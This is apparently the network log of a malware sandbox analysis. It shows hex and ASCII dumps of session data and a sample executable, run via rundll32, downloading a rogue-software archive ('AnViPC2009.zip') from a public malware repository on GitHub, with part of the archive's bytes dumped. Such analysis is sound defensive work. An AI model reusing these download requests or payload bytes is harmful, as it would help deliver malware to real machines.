                                                                                                                                                2022-09-29 12:49:43 UTC10468INData Raw: 22 dc ae da e4 80 d0 5b a8 76 9b 30 c1 1b 4d 23 42 09 79 df 5e d5 b0 ab 29 c1 95 9e 25 52 f0 75 e2 1f a1 32 be 86 bd 70 c3 d8 bd 84 1a ec f7 38 e3 2e 03 8e 45 26 83 50 d4 47 0d b7 86 1d 01 c3 27 44 ea 53 be 94 ec 9a 6a ac 36 a7 78 92 2d b5 9c 5f ec 38 ba 12 26 ae 2a a6 39 c0 f4 17 0e 0e ae 67 19 8d fe 2e 39 69 f9 b2 35 e4 d3 b5 0b e6 c8 2e 27 56 3e 64 26 6d 47 32 6f 44 87 2d 74 36 f9 20 9d c4 fc 6e b2 8d 7e 66 99 21 bb 71 e1 6b e9 8a 01 87 84 4d 6c 1d 6b a5 f1 d9 24 2f a8 91 59 09 8e 66 08 0b 09 51 c6 5d 8b aa 8a 1f 25 59 22 30 c8 a9 a0 29 23 43 bf d6 4b 7b 85 a1 2f 8f 09 db 47 60 28 e1 b3 25 11 dd 0b 95 72 6e 2e 05 e0 a5 6c 04 f8 e0 d2 36 fd 45 1d b9 a1 3a 9f 2c 1c 30 0e da 47 ea dd 38 60 de 55 2f 42 dd c3 2a ee 07 69 f8 88 c4 c2 12 dc 73 d5 45 35 c4 3c
                                                                                                                                                Data Ascii: "[v0M#By^)%Ru2p8.E&PG'DSj6x-_8&*9g.9i5.'V>d&mG2oD-t6 n~f!qkMlk$/YfQ]%Y"0)#CK{/G`(%rn.l6E:,0G8`U/B*isE5<
                                                                                                                                                2022-09-29 12:49:43 UTC10484INData Raw: 6c 9e 76 53 28 0e bb 63 23 ef 9a 95 1e 3c 5e 98 1d 68 e9 0b 1f ef 1f f4 1d 7a bc ff 6d a3 27 41 44 41 cc 5e 25 16 10 d9 9c d0 cd 15 4b 11 1e 3f 61 30 ea a9 d3 ce 15 83 ee 41 fb 9c 10 17 4a 36 9f 39 7d 03 58 43 11 0b 0e 9b 8d 54 e7 80 15 ee a4 98 66 a6 e4 79 3d ae 53 06 72 72 c6 cf 44 3d 24 84 57 a4 cd 05 ec 39 d6 b2 c7 2d 94 70 ab 37 af 2d 1d 9e cf 37 a5 f3 4c 34 d7 7f 42 6b 9a 1e 88 24 5c 71 8c 9f f5 6d d7 4e 49 ac 77 c5 cc 0c ff 3e d8 4d 34 34 4f 8e 82 f3 74 c9 16 c8 0e 2b da 89 35 f4 19 fc d8 58 20 32 5a 7e 45 e5 fe 48 37 0b f1 ca 97 19 26 50 a7 cc 0c 0c e3 78 a9 b2 e5 75 fb e6 df bd a1 ff 7f 32 a2 c7 76 e5 d3 51 35 1c e4 54 2f e7 f4 ed eb a2 0a 5d e9 c6 1d 75 ee 94 fc 90 92 74 55 b9 37 6b 03 a7 96 90 64 c5 65 51 0e 5a 45 bd f3 07 7d 1a 2d 50 af f2 b4
                                                                                                                                                Data Ascii: lvS(c#<^hzm'ADA^%K?a0AJ69}XCTfy=SrrD=$W9-p7-7L4Bk$\qmNIw>M44Ot+5X 2Z~EH7&Pxu2vQ5T/]utU7kdeQZE}-P
                                                                                                                                                2022-09-29 12:49:43 UTC10500INData Raw: 00 8c 57 f4 bb ce 99 bc ce 29 08 4a 63 40 8b 28 a9 c7 d3 fe e6 fa 94 32 d9 69 85 ab e2 9a 80 22 df 8e 16 b5 1b 00 e4 d0 99 66 39 e8 4b 0f d3 c7 63 7b 92 fd 72 9e 12 cd 3d 04 0f 75 24 cb fa 87 98 ce 7c 0b c4 f5 28 aa 5c a5 fc d8 df ff 88 00 4d a4 a4 18 d2 ff 7c 90 15 cf 53 04 28 44 e3 aa 68 cc f1 17 01 57 c3 08 b2 20 50 86 90 2d 89 a2 42 ad 8b a1 07 ed da 96 02 0f e9 79 2c bc 07 d1 3f 5e 68 a9 43 2c 5e 74 8e 09 5c d2 30 35 2a 0a 95 eb e3 cd be 1a f1 99 de 9d 65 cb 15 9d ad bd 61 d6 99 03 f7 d5 6a 66 55 92 5f b1 f6 bd 79 8d 96 22 3b 4a 5b 2e 5d c3 39 b3 c3 e5 54 2f d2 bb bf b4 99 14 d8 b0 5c fc ad 1d b2 b0 39 d7 27 bf d0 9c 7a 77 01 d6 23 2a 30 26 d1 97 d6 e8 4e 8f bf fe 40 14 4e f3 94 bf 6c 83 7d cb 6d 53 0e b2 16 cd 5b 59 94 3d 2b 5c b7 24 f6 e6 9d 63 a2
                                                                                                                                                Data Ascii: W)Jc@(2i"f9Kc{r=u$|(\M|S(DhW P-By,?^hC,^t\05*eajfU_y";J[.]9T/\9'zw#*0&N@Nl}mS[Y=+\$c
                                                                                                                                                2022-09-29 12:49:43 UTC10516INData Raw: 61 33 b3 a4 5a c6 65 cc 17 14 dd 75 64 25 2b 16 70 04 f4 cf c1 85 fc 19 aa ed bc 5d 3d 2f 76 9c 20 0a ef 0e aa cb 79 18 7c 57 ac a0 3d de 01 a7 eb e0 4d c3 e5 62 12 34 04 92 9a 74 3b f4 ce ff 20 06 84 ec f3 95 00 fe 1f 67 37 7d 2b 8d d8 21 bc bb 75 96 3e d1 26 fc c2 e1 4a 75 20 1d 15 d2 81 f8 38 11 ae c1 05 76 62 dc ec ec f3 e9 d8 9b f6 d5 13 e1 58 a3 85 a8 4d ab 95 91 2c f4 3b ab eb 68 b6 00 09 f6 fc 2d d4 05 8a c5 b8 0c 3c 8a df f7 94 30 9a 0b 7e fd 3a 67 09 20 0d 60 7f 02 bb 1c 36 3f f4 c9 1a c9 43 97 77 d7 6a 1d d1 bb 88 b0 e7 82 72 62 85 18 7f cc 56 7a 6c 7f d3 2d c0 e2 5a 18 94 a2 a2 c5 5a ab bc c1 04 ef f1 cb ec 27 4a 30 d6 6d 00 ee 99 5f 12 81 e1 73 b1 78 6e 57 69 5d 58 95 7b 6b b0 c8 d5 90 7b 3b 7f e1 cb 07 3d ee 59 a8 ba c1 90 bb 82 c6 17 02 57
                                                                                                                                                Data Ascii: a3Zeud%+p]=/v y|W=Mb4t; g7}+!u>&Ju 8vbXM,;h-<0~:g `6?CwjrbVzl-ZZ'J0m_sxnWi]X{k{;=YW
                                                                                                                                                2022-09-29 12:49:43 UTC10532INData Raw: 6a 3d 18 97 06 a3 10 aa dc 63 1e 4a 54 c6 84 ac 6a 0c 19 a6 25 7d 91 50 8e cb b6 26 fa 38 4b ab 0b 01 e6 6e e5 54 8a 1b 9d 22 96 96 7b 38 4b 96 02 01 6e 52 46 f7 0a 30 2d 49 56 82 d8 7e d9 7e 82 a3 97 fc 3d 05 9c 56 d6 c6 f8 f4 c8 d5 18 93 4a 3b 1d c7 a6 a1 d7 03 60 08 c4 93 e1 75 23 9e 2a ef dc b6 c9 45 33 32 ba 49 81 d8 a0 2e 7a a2 70 69 c3 9b d3 9d e2 2a c7 17 8f 8e 2f 47 03 9e 44 d6 26 87 2c ed f4 ab 21 e7 86 c7 2e b4 f1 98 78 db 24 ff fb dd 18 34 6a 19 a4 bd 99 a9 2d e0 e6 b6 94 ca e6 fb c1 70 01 c9 e5 1f ab 38 8b de 4d 0a 73 80 70 f2 72 6d 7f 9a 02 88 76 58 74 35 3c a4 e5 f9 de 82 b7 e8 80 45 0f 02 48 61 c4 ab 3c 53 00 11 7e b6 45 e7 7d aa 33 8c 6e 20 d0 a4 df 0c da 89 2c 00 8b ed c2 bb ce 9e f1 53 26 08 e6 53 f4 08 95 c5 36 fb e3 f2 81 21 96 1d a2
                                                                                                                                                Data Ascii: j=cJTj%}P&8KnT"{8KnRF0-IV~~=VJ;`u#*E32I.zpi*/GD&,!.x$4j-p8MsprmvXt5<EHa<S~E}3n ,S&S6!
                                                                                                                                                2022-09-29 12:49:43 UTC10548INData Raw: 6e 49 ca d9 c6 89 d7 46 7a 1a a7 c2 0e 9b 38 e2 72 1b d1 88 5b 08 c2 22 79 a0 d4 a6 29 34 25 d1 56 08 39 f2 25 77 7c ba f8 33 45 ee c0 1e 98 89 2f 23 08 25 05 5f 7e 90 4a ad ba 7e d6 50 f6 e0 45 28 3b 04 60 4f b7 0e 18 20 d7 89 f5 d1 8a 95 27 eb 21 55 42 04 f4 fa f0 25 81 64 a5 c9 c3 c1 03 54 03 a7 67 82 68 d8 28 28 96 3c 70 a8 94 7e 7f 5b f3 60 09 2d 15 c3 5d 97 77 9d 9c bc 5a 57 b8 54 8e e7 f6 25 46 73 fe 65 a0 cf eb a1 8b e6 87 cd d3 ec 2c 5a 82 84 cd 32 d9 bb 9f 0e 6c 6f 7f 94 b5 0e 70 26 b7 48 88 ba ce d4 b0 39 95 e9 cc 80 26 94 58 7b e3 26 7a 86 bf 5b 0b e9 70 99 47 8b c6 83 96 5f 62 23 db 4a a4 a4 1f 81 a9 de 56 35 01 a5 6f 1f 15 eb 65 65 a8 7d 2d 07 ed ad 4d 06 f5 bb f4 06 e7 94 d7 a8 df 9a cc af 26 b9 57 df 72 43 ac b4 b0 23 48 04 51 a1 52 92 54
                                                                                                                                                Data Ascii: nIFz8r["y)4%V9%w|3E/#%_~J~PE(;`O '!UB%dTgh((<p~[`-]wZWT%Fse,Z2lop&H9&X{&z[pG_b#JV5oee}-M&WrC#HQRT
                                                                                                                                                2022-09-29 12:49:43 UTC10564INData Raw: 27 96 d6 01 e7 9c 5b a2 49 0e 0c 43 36 51 14 00 c8 f5 ab 65 b9 41 3d 7b bb 7a 90 dd ca 2e 1e 2e f6 fb 86 ac ca 64 49 30 80 13 61 9f fa 68 a2 1a 2d 90 af 99 bf b6 fc a5 59 3b ce 83 ed 1a 7d e5 95 4d e4 e9 24 95 88 3b 09 90 07 c2 59 70 7f cd ad 4c 18 10 7b d4 6a e6 a1 38 eb 9b c0 f5 59 bc 6a b3 2a 0f 55 a1 e8 93 f1 f2 df d0 47 67 55 ef 80 c6 76 f0 29 2e da 93 81 5b 76 e4 2a 60 2f 03 7d ed f7 b5 cb 9c 30 35 34 78 cb 30 98 05 c3 64 84 ba d0 df 86 50 a1 39 ff 21 bc b2 38 35 e4 cd 69 17 17 bf f1 03 a2 bf c1 69 54 a5 cb df 8e cd 2d 48 37 67 fb bd 95 b4 eb 82 83 6d 32 94 39 47 22 2b eb 49 b3 0e d9 95 e3 42 fe 32 44 69 a5 d7 99 d0 d2 e9 9c aa f3 33 48 ba 66 3a 98 49 d2 78 3e b3 72 70 5c 61 8a e7 c4 4b 13 51 41 a3 92 5b 5a 1f 2c 34 9e 3e 56 49 3c 43 62 7f a2 34 32
                                                                                                                                                Data Ascii: '[IC6QeA={z..dI0ah-Y;}M$;YpL{j8Yj*UGgUv).[v*`/}054x0dP9!85iiT-H7gm29G"+IB2Di3Hf:Ix>rp\aKQA[Z,4>VI<Cb42
                                                                                                                                                2022-09-29 12:49:43 UTC10580INData Raw: d8 5e f6 0b 5f 68 b5 2a 9c 58 74 64 f6 a4 65 01 27 1b 34 a7 b2 b8 4e 25 ab cc 39 91 53 f3 3b 9b 45 25 08 e6 db c2 8b 08 4b cb 6c e4 83 4a 34 84 d0 12 2d 97 5d c1 60 8d f9 98 9c 6e a3 1f 68 37 6a e2 f6 c9 03 a8 77 24 da ec 55 c0 80 e0 46 71 e9 9e 7c 5b f8 a9 4e c2 5d 00 3e ff 75 e7 82 1f 1d cd 5d 5e d3 fc ca 48 85 03 26 df 53 c9 52 59 16 b6 19 05 93 88 b6 8e c1 ec 7a b2 93 37 b9 f4 f0 00 7b 23 81 68 04 c2 63 e0 27 98 f3 a5 3d de f3 22 57 df 4b 0d 00 cb 7f 1c d1 22 d5 32 c0 80 88 3e 59 2a 3a 60 0c ba da ca a0 9d af 4d 2a c8 52 80 82 44 e6 79 fe 1a 93 76 d9 e6 8d bb de 98 28 f4 b7 fa 6b f9 89 9f f7 10 79 49 ee 28 71 68 14 e1 6e 6e 0c ff d6 35 e6 a6 42 13 26 78 2b 1a d2 05 68 0c d1 4b cc 44 f4 79 c9 0b 23 75 f0 c1 1e 6d 77 a3 7b 5c 5a 79 dd e0 f8 99 27 24 15
                                                                                                                                                Data Ascii: ^_h*Xtde'4N%9S;E%KlJ4-]`nh7jw$UFq|[N]>u]^H&SRYz7{#hc'="WK"2>Y*:`M*RDyv(kyI(qhnn5B&x+hKDy#umw{\Zy'$
                                                                                                                                                2022-09-29 12:49:43 UTC10596INData Raw: ea 8d 5e 67 0f 44 a5 cb 12 0d d8 b5 9f ee 62 c2 ea 20 22 5b 12 ea 96 91 da 56 40 f7 51 0e f5 2a 5d 1c ed 21 ea f6 3e 31 ac 44 8b 04 99 7c a7 44 37 ea 42 eb 5a db ab 0a b9 10 05 ba fc cb 6c dd 4b 4f 4f 89 db fd 51 c8 10 c6 5c 88 e2 a6 43 29 e7 2e 49 aa 9b 31 8a 4b 75 bc cd fd a6 1b 57 4b 0e 50 43 b7 82 f4 ad 21 5a cd a9 4d 44 6c ce 9f ae 25 f5 0c e1 db 12 73 92 6d 07 2f 8b e2 e5 f5 16 d9 28 b4 8d 2f 88 29 eb 2d 21 34 5b ee ca 9f 60 37 65 68 dc bc c6 9c f3 66 db 8f d1 f7 ed f8 b0 38 51 a4 e3 12 f0 ef d1 0e d4 2b 3a d5 7e cf 01 a7 3b 4e 2a bb 28 a3 e0 d1 0e cf 58 bc ae 83 ad fb d7 5e 95 0b 62 1a d7 17 44 e8 e6 9e 1f 68 40 cb cd ac 05 08 93 1b 78 ca 6a 67 ed 68 b1 9a fd c7 75 b1 61 8a 9e 4e 29 fd cb 9d e4 31 d6 42 70 47 0c d5 4a 3f 0e f0 bd c0 eb 76 5d b2 26
                                                                                                                                                Data Ascii: ^gDb "[V@Q*]!>1D|D7BZlKOOQ\C).I1KuWKPC!ZMDl%sm/(/)-!4[`7ehf8Q+:~;N*(X^bDh@xjghuaN)1BpGJ?v]&
                                                                                                                                                2022-09-29 12:49:43 UTC10612INData Raw: d0 7b 19 3e 4d 51 7b 8e eb dc 42 f6 91 ca b4 16 63 39 99 1e 1a e0 cb 2f 53 d9 5f 52 18 c8 82 ce 0c a7 5a f5 10 cf 3f e6 62 1d 57 7d d1 1b 29 63 80 09 63 72 ce d0 42 b3 0f 57 56 32 8f 70 89 e8 be 64 b6 31 5e 0b 28 78 99 07 3d 66 74 dd 0d f7 51 8d c0 b0 34 23 4f 51 9a eb d1 f8 1f 91 36 99 60 8e 0e c3 1f bc 23 f1 b8 01 d5 89 65 4b 07 16 5b 66 11 99 0c 07 39 be 0a 52 51 75 cc e5 7a 34 88 c2 ac 67 61 ed 9d ab 80 08 fd 0c f3 37 3b 39 91 ac 88 10 09 03 4e 49 86 c5 ff fe f2 48 a8 d8 4d 36 52 a4 ba e3 b9 a9 09 d2 3b ab 6b 50 b1 88 73 cc 56 21 5e 32 d5 5e 69 69 0c e6 b6 84 75 27 e6 e8 c5 0b b7 e0 8f 0a e3 19 e2 3a 1d 05 c4 08 f9 d5 9d b2 3f bc b4 f2 dd 2c 4e d9 6d 2b 95 05 47 10 67 56 23 e4 d0 4e da ed d2 e7 25 a5 63 6d a4 02 46 5f c8 5d 03 98 59 f0 19 d7 19 ff 5b
                                                                                                                                                Data Ascii: {>MQ{Bc9/S_RZ?bW})ccrBWV2pd1^(x=ftQ4#OQ6`#eK[f9RQuz4ga7;9NIHM6R;kPsV!^2^iiu':?,Nm+GgV#N%cmF_]Y[
                                                                                                                                                2022-09-29 12:49:43 UTC10628INData Raw: 89 10 70 b2 8b 7d b0 b3 9f c2 f6 06 9f cd 57 b9 9b 5e 62 0d 01 7d b2 82 77 b8 9e 22 0a 6f 81 7c e9 b4 15 c4 05 6e a3 60 f0 01 67 59 ff 51 46 78 e1 b5 52 a5 26 c1 e0 97 69 e8 1f c0 58 62 6e 62 6f d4 e9 e3 12 34 b2 a3 5a bb 3f f8 47 57 37 27 8a 94 26 3c 2a 68 aa f3 56 e3 93 1d 9d 16 ba 71 7f 61 54 8c a2 d3 f6 11 e0 57 df b3 e6 c6 5e c5 5e db 1d c0 ce 29 8f 24 0b a8 05 7f aa 44 73 8a 12 70 75 eb 61 35 dd dd 54 60 e3 bd b9 63 33 71 da fc cf c0 10 aa 3f 10 27 7e 20 9d 00 04 13 6f c5 87 1f 2e de d2 1c 11 db 65 75 3a 27 24 ac 63 09 19 21 45 70 24 56 1f 81 fa 2a 23 0c ed 3a e3 45 76 21 97 2c c7 24 c4 34 33 d1 d1 ac 5f 99 2c b8 17 27 96 b5 68 3f f7 f2 e3 d2 d7 3e 93 16 27 f7 f6 08 b8 29 96 0c 42 5f f5 3c 00 16 aa 96 59 01 31 1b 05 c6 69 e8 48 c0 a0 a7 90 d2 e8 b4
                                                                                                                                                Data Ascii: p}W^b}w"o|n`gYQFxR&iXbnbo4Z?GW7'&<*hVqaTW^^)$Dspua5T`c3q?'~ o.eu:'$c!Ep$V*#:Ev!,$43_,'h?>')B_<Y1iH
                                                                                                                                                2022-09-29 12:49:43 UTC10644INData Raw: 93 34 11 f9 60 30 7c 9d 9f 30 b0 8e 31 c7 83 3f 2a 03 61 d6 5d e7 57 f7 c0 ef d6 fe 6a f7 b9 5b 96 d2 b7 45 ab ab d6 f8 5a 76 9d 6b ce 09 4b f3 69 c1 3f e2 a1 a9 57 aa a7 f5 86 14 d3 6d 7a 9b ce 81 01 cc ae 91 69 d6 a8 a9 ef 75 c3 4d 07 49 55 ba f8 e0 aa 4e d1 d2 e8 e2 dd 6c 09 e2 0a 73 63 ee 5b 18 3b 3f e5 04 1a dc af 67 32 74 d0 0d 9c 18 75 b4 53 eb 05 59 fb 3a 81 eb 55 58 84 8a 4d e3 3e 07 f7 f8 b3 d2 ec f5 e6 87 09 68 cf 2c 76 2c 1d 74 dd 34 5e d5 c9 1b 6e a2 92 08 79 b3 57 4d b5 4e 02 bf b8 cb 0a 0a bb c3 d1 91 82 99 43 f5 02 df 17 a2 8b 88 73 19 87 bd e9 fb 46 04 e6 74 f8 18 35 61 bc e1 34 71 39 73 b2 0a 39 1c 31 c1 30 10 9a f9 c4 ff b8 f3 bd 1f 49 c0 b2 84 aa e0 44 22 53 bd ac 2d 74 b5 8a e3 c8 38 3b d9 cd 55 ca c2 0f 3b 0a 45 b3 44 0e 48 23 e3 04
                                                                                                                                                Data Ascii: 4`0|01?*a]Wj[EZvkKi?WmziuMIUNlsc[;?g2tuSY:UXM>h,v,t4^nyWMNCsFt5a4q9s910ID"S-t8;U;EDH#
                                                                                                                                                2022-09-29 12:49:43 UTC10660INData Raw: 1f 30 d1 42 d2 52 7b bc bd 5c 09 12 b4 42 e4 d5 79 d1 23 f3 46 4b 53 8a d6 89 f0 18 af da 8c b0 2a 33 ad 33 c0 ea 36 0d 1a 61 e1 0b 76 46 9b 4a 13 55 82 a2 d5 7a a1 4d ff 4a 13 d4 a9 43 45 64 e4 0d 78 46 9d 62 44 85 e5 e6 3f 07 3f 0a 24 2f 93 2e fd 0d 68 76 2a 94 62 e3 59 6b 70 c9 57 3f 30 03 16 1b 44 27 a2 58 45 48 e1 d2 16 e0 e5 72 ba 28 cb 85 d5 eb e7 30 e0 f4 f1 e1 2f a4 83 ba fa 72 32 a5 be b2 67 1e e2 d1 3a 69 cb 7b d3 ff 03 2c 6f ef 41 37 86 98 f6 0e f4 a6 63 ee 61 9e 15 9f 53 71 d1 d6 cc 43 46 89 40 d4 24 72 50 a3 bf cf 84 67 3f 60 c9 5f 99 40 08 2c ef c8 85 7f 1b dc 05 91 34 09 3b 10 84 8e 8a bd 08 b6 c5 f6 3a 8a 32 bd fa af a6 5e d2 89 48 20 17 35 65 e8 c3 00 2a 73 c9 e0 cc ed e6 16 11 3a b0 11 54 f8 dd 86 f4 cb 50 bf fc c3 4a 84 94 75 af fd 69
                                                                                                                                                Data Ascii: 0BR{\By#FKS*336avFJUzMJCEdxFbD??$/.hv*bYkpW?0D'XEHr(0/r2g:i{,oA7caSqCF@$rPg?`_@,4;:2^H 5e*s:TPJui


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                72192.168.2.349754104.208.16.94443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:49:43 UTC10661OUTPOST /Telemetry.Request HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                User-Agent: MSDW
                                                                                                                                                MSA_DeviceTicket_Error: 0x800704cf
                                                                                                                                                Content-Length: 4597
                                                                                                                                                Host: watson.telemetry.microsoft.com


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                73192.168.2.349759140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:49:46 UTC10661OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/AnViPC2009.zip HTTP/1.1
                                                                                                                                                Host: github.com


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                74140.82.121.4443192.168.2.349759C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:49:46 UTC10661INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
                                                                                                                                                Date: Thu, 29 Sep 2022 12:48:31 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/AnViPC2009.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                2022-09-29 12:49:46 UTC10662INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                75192.168.2.349760185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:49:46 UTC10663OUTGET /Endermanch/MalwareDatabase/master/rogues/AnViPC2009.zip HTTP/1.1
                                                                                                                                                Host: raw.githubusercontent.com


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                76185.199.108.133443192.168.2.349760C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:49:46 UTC10663INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 1178406
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                Content-Type: application/zip
                                                                                                                                                ETag: "4b7f39242bdc3c2d1323de2cf6529b8807eb1cfe6f7dc4241f8df746b2145355"
                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                X-GitHub-Request-Id: 0866:67BD:BA80D:1793D0:6335928F
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Thu, 29 Sep 2022 12:49:46 GMT
                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                X-Served-By: cache-mxp6930-MXP
                                                                                                                                                X-Cache: HIT
                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                X-Timer: S1664455786.129011,VS0,VE184
                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Fastly-Request-ID: e9d4963ecc3deaa0c1da03aeb5d9c50d13160110
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:54:46 GMT
                                                                                                                                                Source-Age: 0
                                                                                                                                                2022-09-29 12:49:46 UTC10664INData Raw: 50 4b 03 04 33 00 01 00 63 00 c3 5c f5 3c 00 00 00 00 58 fa 11 00 5a bb 12 00 19 00 0b 00 45 6e 64 65 72 6d 61 6e 63 68 40 41 6e 56 69 50 43 32 30 30 39 2e 65 78 65 01 99 07 00 02 00 41 45 03 08 00 18 1e 19 ad d3 ff 2d 34 78 35 ff b8 e5 42 12 9c 05 07 97 5d 8c 1a 3c eb c6 99 7d 87 2f 61 b9 e2 28 ee 82 71 5c ce 7b 7c 30 98 9b eb 94 90 c9 3c 15 7b b7 9c ba 5f ff 0a 3a ba bb f0 04 ba 43 3a ee c9 99 f4 b2 d8 3c 52 0e eb 5c 5d b2 e2 78 a5 65 02 53 2a 04 41 4d 0f 32 09 f9 96 bf d5 21 02 00 db 0f 54 dd fd 79 94 e9 75 e8 be e9 32 91 5f 70 01 4e 0b b8 02 bb c3 53 72 9f ea f9 c2 8c 2f 31 b8 0f 6f 9e 32 7f 96 1e 1d 26 00 13 55 a5 44 92 af a0 7a 25 bb ba 49 a6 1f 52 6e 15 0e 72 dd 98 30 df ba c9 10 ed e7 c7 80 d6 00 cf 6d e4 2c 60 84 51 9a 88 a2 aa d4 0c dd 3c eb db
                                                                                                                                                Data Ascii: PK3c\<XZEndermanch@AnViPC2009.exeAE-4x5B]<}/a(q\{|0<{_:C:<R\]xeS*AM2!Tyu2_pNSr/1o2&UDz%IRnr0m,`Q<
                                                                                                                                                2022-09-29 12:49:46 UTC10666INData Raw: f0 89 95 f9 82 16 4d 9f bc c0 c4 30 d2 18 2b 95 f7 c3 87 5c ec 63 db 65 52 73 c4 32 83 3a 07 d7 99 f3 32 e1 8f 52 02 16 a8 ad 95 19 72 b9 2f d6 2b 3a fd ec ce 99 d5 e7 be 78 09 d5 08 31 ce 3c 2b fb 48 65 13 32 23 4a b0 2b 7c ca 5f 70 6d 2f 1a af 52 17 f6 f2 61 fc 1d a6 9b 78 de 94 a1 e8 f9 ad 49 b3 30 2f 9e e4 12 5c b1 a9 26 a8 45 dc 7c c9 02 7a 32 c5 f5 95 d0 d0 7b fe 0c 0d 23 ee bd 71 20 1c 8b 68 5d a1 ce 07 fa 07 6b 00 c7 5e 7f 30 aa bd c1 5a 14 f3 25 1f 16 3e 74 27 fb 06 d0 80 52 ed e6 39 4a 9c 87 25 49 5a c5 5b 26 b8 4b d6 d4 29 c2 56 81 e8 94 e7 64 c3 f7 0e 69 db 9a ec 51 77 ba ea d2 2a 14 40 c8 c2 2f d9 64 15 d6 57 34 66 40 5b 20 e0 40 43 55 e4 27 25 c2 d5 61 03 db 15 e3 3b d4 64 49 bf 9a d1 84 a9 e8 6f 17 82 43 ad 17 4e c5 37 ac 78 04 a6 64 fd 07
                                                                                                                                                Data Ascii: M0+\ceRs2:2Rr/+:x1<+He2#J+|_pm/RaxI0/\&E|z2{#q h]k^0Z%>t'R9J%IZ[&K)VdiQw*@/dW4f@[ @CU'%a;dIoCN7xd
